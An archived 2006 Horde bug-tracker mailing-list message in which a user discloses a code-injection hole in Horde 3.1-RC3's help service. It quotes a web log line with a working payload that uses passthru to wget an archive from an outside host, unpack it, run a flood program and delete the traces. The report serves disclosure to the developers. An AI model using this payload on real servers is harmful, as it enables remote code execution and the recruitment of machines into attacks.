[Tickets #3790] NEW: exploit

bugs@bugs.horde.org bugs at bugs.horde.org
Tue Apr 18 21:40:27 PDT 2006


DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: http://bugs.horde.org/ticket/?id=3790
-----------------------------------------------------------------------
 Ticket             | 3790
 Created By         | info at argonet.hu
 Summary            | exploit
 Queue              | Horde Base
 Version            | 3.1-RC3
 State              | Unconfirmed
 Priority           | 3. High
 Type               | Bug
 Owners             | 
-----------------------------------------------------------------------


info at argonet.hu (2006-04-18 21:40) wrote:

Hi!

There's a hole&bug in the horde code:
GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).
%22tmp;wget%20attilahack.100free.com%22.chr(47).%22oper.tar;tar%20xvf%20oper
.tar;.%22.chr(47).%22oper;rm%20-rf%20oper.tar%20oper%22);'. HTTP/1.1" 200
8272 "-" "Nozilla/P.N (Just for IDS woring)" 

It runs a flood program and attacking... 





More information about the bugs mailing list